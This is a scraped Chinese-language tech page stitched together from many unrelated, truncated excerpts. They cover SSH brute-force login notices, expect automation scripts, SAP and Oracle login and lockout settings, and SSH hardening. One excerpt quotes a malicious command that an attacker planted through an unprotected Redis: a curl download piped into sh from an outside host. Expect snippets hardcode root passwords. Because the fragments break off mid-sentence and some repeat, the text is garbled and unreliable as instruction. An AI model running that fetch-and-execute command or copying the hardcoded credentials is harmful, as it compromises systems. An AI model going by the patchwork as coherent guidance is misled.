Last failed login: Sat Mar 16 10:14:22 CST 2024 from 103.47.132.204 on ssh:notty
PS: 记不住ip,所以在个人电脑的hosts文件中设置了个别名,因为用的腾讯云服务器,就叫qqcloud。
最近开了一个服务器,只要晚上一登录的时候就有很多,暴力破解的登录提示,没有觉得安全,只有相对的安全。
如今一些比较大的企业,大都使用了负载均衡,而有时因为一些程序要更改,或者有些bug要修改,快速更新代码等,如果仅是几台server的话,很简单,把已经改好的程序拷过去,或者rsync远程推送,再或者网上NFS共享一下就可以了;但如果有几十台几百台,那样的方法会太繁琐,此时就可以用expect来批量实现分发任务。
这是 PAM 的 last_log 模块的输出,这个数据统计的是上次成功登录之后,有多少次失败登录的尝试。这些失败尝试主要来源于网上各种扫描器,统计数据来源于文件 /var/log/btmp,查了一下这个文件有36M 那么大,处理起来应该说是比较费劲的,隔久了之后登录这个统计数字高达好几万。
最近主机受到攻击,原因可能是redis集群没有设置密码(因为快过期了,不想搞得太复杂就没设),然后被人家搞事情了,就被人一把set了些执行脚本,形如curl -fsSL http://d.powerofwish.com/pm.sh | sh,真的是猥琐啊,我登上主机一看,简直是猥琐至极,不能忍了啊。
本文主要叙述ChatGPT-Next-Web在腾讯云CVM云服务器上使用Docker镜像的方式搭建。
1、云主机,每次上都有如下提示(各种被扫描和攻击…) Last failed login: Tue Dec 12 07:55:36 CST 2017 from 219.146.144.254 on ssh:notty There were 14011 failed login attempts since the last successful login. Last login: Mon Dec 11 09:23:25 2017 from 180.110.80.73 研究后发现配置ssh密钥登陆并关闭
版权声明:本文为耕耘实录原创文章,各大自媒体平台同步更新。欢迎转载,转载请注明出处,谢谢
expect脚本远程登录 yum install -y expect 自动远程登录 [root@aminglinux-02 sbin]# vim 1.expect #! /usr/bin/expect set host "192.168.133.132" set passwd "123456" spawn ssh root@$host expect { "yes/no" { send "yes\r"; exp_continue} // "password:" { send "$pass
path: /usr/sap/PRD/SYS/profile profile: PRD_DVEBMGS00_sapapp 如果您想查看所有的参数及当前设定,可使用SA38 执行程序 RSPARAM 修改附加配置 T-CODE:RZ10 进行SAP系统参数的设置,设置后需激活参数并重启SAP实例,配置参数才会生效 login/system_client 登录时默认的Client号 login/password_expiration_time 密码有效期 login/fails_to_user_lock 密码输错多少次后锁定 login/failed_user_auto_unlock 用户失效后多长时间解锁 rdisp/mshost 状态栏中显示的系统名称 rdisp/rfc_use_quotas 是否激活配额资源分配,0是关闭,1是启用.以下相关限制必须这个为1时才生效. rdisp/gui_auto_logout 表示如果客户在指定时间内没有进行任何操作,则会自动退出SAP系统。时间为秒 rdisp/max_wprun_time 程序运行的最长时间限制 rdisp/rfc_max_login 最大SAP用户登录数 login/disable_multi_gui_login 限制用户多次登录,该参数可以设置同个client 同个用户ID可以允许同时登录几个,当设为1时,系统将提示用户选择: 'Terminate the Current Sessions' or 'Terminate this Login.' ,以达到保证只允许一个登录. rdisp/tm_max_no 这个参数是限制每个实例最大的用户数,默认是200个. rdisp/rfc_max_own_login 一个程序在一个服务器 上允许分配的RFC资源个数,也就是同时能运行多少个.默认值25. rdisp/rfc_min_wait_dia_wp 设置RFC保留的会话设置, rdisp/wp_no_dia 在一个实例中处理的会话数目,如果设置为10,rdisp/rfc_min_wait_dia_wp=3 则可用的会话处理是7,3个被保留 rdisp/rfc_max_own_used_wp rdisp/rfc_max_comm_entries rdisp/rfc_max_wait_time rdisp/btctime SAP调度器(SAYMSSY2),定期自动运行,由这个参数指定运行时间间隔。 rdisp/btcname 事件触发后运行envent scheduler 主机名称 rspo/store_location 文件存储位置(假脱机) wdisp/server_info_location the default is /msgserver/text/logon.The URL to retrieve the list is determined this parameter rdisp/mshost 信息服务器设置 ms/http_port http服务端口 auth/new_buffering to 该参数设为4,权限的修改将立即起作用,不用用户重新登录. Note 209899. 系统性能参数调整类: SAP 描述文件参数 参数 建议值 abap/use_paging 建议值:0(关闭)使用:重新激活旧的 ABAP/4 分页系统获得清单和简单表格类型。 abap/heaplimit 建议值:20000000(20MB)使用:用户环境完成处理后,重新启动一个工作进程来释放局部私有存储。 abap/heap_area_total 建议值:500000000(500MB)使用:设置 SAP 应用程序服务器可以使用的进程局部存储限制。对服务器的使用或交换空间设置限制。 em/initial_size_MB 建议值:250(250 MB,每个用户五 MB)使用:SAP 共享内存的大小。 em/stat_log_size_Mb 建议值:20使用:统计。 em/stat_log_size_timeout 建议值:600使用:统计。 rdisp/ROLL_MAXFS 建议值:32768使用:滚动文件的最大规模。 rdisp/ROLL_SHM 建议值:4096 使用:滚动缓冲区大小。 rdisp/PG_MAXFS 建议值:32768使用:ABAP/4 分页文件的最大规模。 rdisp/PG_SHM 建议值:0使用:分页缓冲区大小。 ztta/roll_area:滚动区域 建议值:1000000 (1 million bytes)使用:滚动区域大小。 T-CODE
其他两台机器改一下我们的hostname就行了 node2 node3(重复上面的操作)
expect脚本传递参数 传递参数 #!/usr/bin/expect set user [lindex $argv 0] //第一个参数 set host [lindex $argv 1] //第二个参数 set passwd "123123a" set cm [lindex $argv 2] //第三参数 spawn ssh $user@$host expect { "yes/no" { send "yes\r"} "password:" { send "$passwd\r" } } exp
参考链接:[telnet允许root用户登录 - 规格严格-功夫到家 - 博客园](https://www.cnblogs.com/diyunpeng/p/8403534.html#:~:text=telnet允许root用户登录 默认情况下,linux不允许root用户以telnet方式登录linux主机,若要允许root用户登录,可采取以下3种方法之一: 1、修改login文件 redhat中对于远程登录的限制体现在,%2Fetc%2Fpam.d%2Flogin 文件中,如果把限制的内容注销掉, 那么限制将不起作用 。)
在我刚接触linux的时候,登录系统经常会提示有很多次登录失败,there were 47183 failed login attempts since the last successful login,使用last命令查询也会发现有不一样的ip记录,嗯,服务器被爆破了。后来,我更改了ssh的端口,这个现象就没有再出现了,今天就介绍下centos系统更改ssh端口。 开放添加端口 更改之前,首先把我们需要的端口开放出来,防止不能登录的现象 vi /etc/sysconfig/iptables 添加一条语句
在几个月前,笔者介绍了一种保护服务器安全的方法 自动禁止攻击IP登陆SSH,保护服务器安全。这种方法需要自己去动手写相应的脚本,今天要介绍的是开源的脚本实现。
PostgreSQL简介 简介 PostgreSQL在业内通常也简称PG,是一个关系型数据库管理系统,适用于各种Linux操作系统、Windows、Solaris、BSD和Mac OS X。PostgreSQL遵循BSD许可,是一个开源软件,PostgreSQL作为全球第四大关系型数据库服务,正在以飞快的速度发展,目前已经广泛用在各个行业,PostgreSQL本身具有哪些功能特点,请往下看 # 1. PostgreSQL数据库是目前功能最强大的开源数据库,是架构上和Oracle最接近的开源数据库.它基
rsync是数据备份工具(字面意思可以理解为远程同步),不仅可以远程同步数据,而且可以本地同步数据(类似与cp),但不同于cp或scp的一点是,它不会覆盖以前的数据(如果数据已经存在),而是先判断已经存在的数据和新数据的差异,只有数据不同时才会把不相同的部分覆盖。
我们开发一个项目的时候通常会有两个环境,本地测试环境和线上环境。项目开发上线的时候,我们通常会把项目打成一个jar包或war包上传到线上的服务器,此时为了让项目能够运行,我们还要为线上的服务器配置项目的运行环境JDK,Tomcat,ES,Mysql,Redis,Hadoop等等,配置非常麻烦,特别对于搭建集群的时候更麻烦。有时候还会因为本地环境和线上环境的不一致导致很多问题,我们都应该都听说过这句话,我本地运行没问题啊。
每一个用户需求的背后都是因为有场景存在,而这些差异化的场景也都是因为不同的用户类型产生的。
使用 enctype 属性指定浏览器在将数据发送到服务器之前如何对数据进行编码。可能的值为 -
同时设置上述两个文件时,hosts.allow文件中规则的优先级更高,参考上述两个文件进行设置时,服务器只允许192.168.2.130这个IP地址以及192.168.3.0/24这个IP地址段通过SSH进行登录,其他的IP都会被拒绝SSH登录。
最近TKE迎来了nginx-ingress 插件的到来,此篇文章将结合TKE nginx-ingress插件,实现IP白名单配置和service透传client源IP的功能
oracle 11g 用户名和密码默认区分大小写,可更改alter system set sec_case_sensitive_logon=false 设置改为不区分大小写。
用户多次密码输入错误达到一定值就会被锁定。 -- 用户锁定方法 alter user 数据库名 account lock; -- 用户解锁方法 alter user 数据库名 account unlock; 当锁定时连接数据库就会报如下错误。 An error occurred while establishing the connection: Long Message: ORA-28000: the account is locked Details: Type: java.sql.SQLEx
当连接数据库失败次数过多时,MySQL 是否会限制登录呢?数据库服务端应该怎么应对暴力破解呢?本篇文章介绍下 MySQL 中的连接控制插件,一起来学习下此插件的作用。
今天同事反映一个问题,某个测试库修改了密码,并改了相关应用使用的密码后,仍出现一会账户就被锁住,报ORA-28000: the account is locked的错误。 检查过程: 1. 查看资源限制生效参数 SQL> show parameter resource NAME TYPE VALUE ------------------------------------ ----------- ------------------------------ resource_limit boolean FALSE FALSE表示未启动资源限制。 2. 查看该用户所用的PROFILE SQL> select resource_name, limit from dba_profiles where profile='DEFAULT'; RESOURCE_NAME LIMIT -------------------------------- ---------------------------------------- COMPOSITE_LIMIT UNLIMITED SESSIONS_PER_USER UNLIMITED CPU_PER_SESSION UNLIMITED CPU_PER_CALL UNLIMITED LOGICAL_READS_PER_SESSION UNLIMITED LOGICAL_READS_PER_CALL UNLIMITED IDLE_TIME UNLIMITED CONNECT_TIME UNLIMITED PRIVATE_SGA UNLIMITED FAILED_LOGIN_ATTEMPTS 10 PASSWORD_LIFE_TIME UNLIMITED PASSWORD_REUSE_TIME UNLIMITED PASSWORD_REUSE_MAX UNLIMITED PASSWORD_VERIFY_FUNCTION NULL PASSWORD_LOCK_TIME 1 PASSWORD_GRACE_TIME 7 其中FAILED_LOGIN_ATTEMPTS表示连续登陆失败的次数,这里表示连续登陆10次失败则锁定用户。 3. 解除用户锁定ALTER USER pss3 ACCOUNT UNLOCK;后观察现象 SQL> select name, lcount from user$ where name='PSS3'; NAME LCOUNT ------------------------------ ---------- PSS3 10 不到一分钟,登陆失败次数就到10次了。 初步结论: 可能有应用仍使用旧的密码登陆,登陆失败后重复尝试,直到10次为止。 但问题就来了: 1. FAILED_LOGIN_ATTEMPTS设置为10次,但未启动resource_limit,为什么还受到10次的限制呢? 2. 怎么知道还有哪些应用由于未修改密码导致ORA错误呢? 问题1:FAILED_LOGIN_ATTEMPTS设置为10次,但未启动resource_limit,为什么还受到10次的限制呢? 这篇MOS文章160528.1(Profile Limits (Resource Parameter(s)) Are Not Enforced / Do Not Work)文章说了一些: After creating a new profile or altering an old one to limit the following profile resources there is no change: SESSIONS_PER_USER CPU_PER_SESSION CPU_PER_CALL CONNECT_TIME IDLE_TIME L
服务名称 :sshd 服务端主程序: /usr/sbin/sshd 服务端配置文件: /etc/ssh/sshd_config 第二种远程访问:telnet 也是远程访问,是不会经过加密的明文传输,可以用抓包工具直接获取其中的消息 23 tcp 端口;而ssh 是典型的密文访问
SQL> alter user test identified by [new password];
一、由于Oracle 11g在默认的default概要文件中设置了“PASSWORD_LIFE_TIME=180”天导致;
这样可知是上面10.69.1.11的ip尝试多次失败登陆造成的被锁 注: 一般数据库默认是10次尝试失败后锁住用户
Oracle用户被锁原因及办法 在登陆时被告知test用户被锁 1、用dba角色的用户登陆,进行解锁,先设置具体时间格式,以便查看具体时间 SQL> alter session set nls_date_format=’yyyy-mm-dd hh24:mi:ss’; Session altered. 2、查看具体的被锁时间 SQL> select username,lock_date from dba_users where username=’TEST’; USERNAME LOCK_DATE ------------------------------ ------------------- TEST 2009-03-10 08:51:03 3、解锁 SQL> alter user test account unlock; User altered. 4、查看是那个ip造成的test用户被锁
相信大家看过之前的教程已经成功搭建起我们的渗透测试环境啦!那么,在这篇文章中一起开启web渗透测试的第一篇吧!爆破什么的最爽了!
ERROR: ORA-28000: the account is locked
前几天通过plsql登录数据库时,提示密码过期,需要修改密码,那就修改呗。改完过了会,再登录,发现用户被锁了。那就去解锁下吧。
现场在Oracle实施过程中,基于安全考虑(用户名和密码之前暴露给其他公司了),需要对用户密码进行修改。
推荐:http://www.cnblogs.com/roucheng/p/3506033.html
Oracle用户的状态是由密码来决定的,而Oracle中的密码是由PROFILE来配置的。PROFILE是口令限制、资源限制的命令集合。当建立数据库时,Oracle会自动建立名称为DEFAULT的PROFILE。当创建用户而没有指定PROFILE选项时,Oracle就会将DEFAULT分配给用户。
资深数据库专家,专研 MySQL 十余年。擅长 MySQL、PostgreSQL、MongoDB 等开源数据库相关的备份恢复、SQL 调优、监控运维、高可用架构设计等。目前任职于爱可生,为各大运营商及银行金融企业提供 MySQL 相关技术支持、MySQL 相关课程培训等工作。
今天早上FlowPortal系统突然出现如下报错: 连接服务器”127.0.0.1″失败。 原因: No connection could be made because the target machine actively refused it 127.0.0.1:1590
为防止使用者长时间登入在系统中,可设定SAP的系统参数;让系统关闭超过设定连线时候的帐号。
为防止使用者长时间登入在系统中,可设定SAP的系统参数;让系统关闭超过设定连线时候的帐号。 RZ11 :只在本次登陆中有效,重新登陆以后变回以前的配置。 RZ10 :设置永久生效,设置完成以后需要重新启动,配置才能生效。 login/system_client :登录时默认的Client号 login/password_expiration_time :密码有效期 login/fails_to_user_lock: 密码输错多少次後锁定 login/failed_user_auto_unlock: 用户失效後多长时间解锁 rdisp/mshost: 状态栏中显示的系统名称 rdisp/rfc_use_quotas: 是否启动配额资源分配,0是关闭,1是启用。 rdisp/gui_auto_logout: 表示如果客户在指定时间内没有进行任何操作,则会自动退出SAP系统。单位(s)。 rdisp/max_wprun_time: 程式执行的最长时间限制 rdisp/rfc_max_login: 最大SAP用户登陆数 login/disable_multi_gui_login: 限制用户多次登录,该参数可以设置同个client同个用户ID可以允许同时登录几个,当设为1时,系统将提示用户选择: ‘Terminate the Current Sessions’ or ‘Terminate this Login.’ ,以达到保证只允许一个登录。 rdisp/tm_max_no: 这个参数是限制每个实例最大的用户数,默认是200个。 rdisp/rfc_max_own_login: 一个程式在一个伺服器上允许分配的RFC资源个数,也就是同时能运行多少个.预设值25。 rdisp/rfc_min_wait_dia_wp: 设置RFC保留的会话设置,如果设置为10,rdisp/rfc_min_wait_dia_wp=3则可用的会话处理是7,3个被保留 rdisp/wp_no_dia 在一个实例中处理的会话数目。
LocalDB 在 ASP.NET 程序中找不到数据库:有时候错误信息是:无法找到数据库,请确认数据库名称是否正确;而有时候会变成:Cannot open database requested by the login. The login failed. 其实第一个错误信息有时候是身份验证的问题导致的,如果真是数据库名称没写对,而苦苦地寻找解决方案,那就真的可以去撞墙了。 我出现这个问题的情况特别诡异,而这是我第一次接触 SqlServer,对其不大了解,导致了我花了很多时间才解决了这个问题。 首先,我
该系列专题为2018年4月OCP-052考题变革后的最新题库。题库为小麦苗解答,若解答有不对之处,可留言,也可联系小麦苗进行修改。
在DBA的职业生涯中,要面临无数的艰难险阻、排忧解难,所以细致入微,严谨认真的风格必不可少。养成了察微知渐的习惯,才能在分析诊断故障时层剖缕析,直指核心;而我也一直认为,将这种习惯贯彻到学习积累之中,才能形成自己沉稳的技术根基。 我在微信群的交流中,经常看到很多人屡屡提出非常简单的问题,这些问题事实上并未超越大家的能力范畴,只要仔细阅读,稍加思考就能找到答案,我认为这就是学习方法的问题。大家应该首先找到适合自己的学习方法,然后才能在技术生涯中快速进步,提升自我。 以下是我对于一些小的案例、知识点的学习思考,
本文主要研究一下Elasticsearch RestClient的DeadHostState
我们都知道GitHub只有公开库是免费的,而私有仓库是需要花钱买的。所以我们可以想办法自己搭建一个私有的,仅自己公司使用的。Gitlab是个不错的选择。在介绍它之前,先讲述一下如何搭建命令行的git服务器。
领取专属 10元无门槛券
手把手带您无忧上云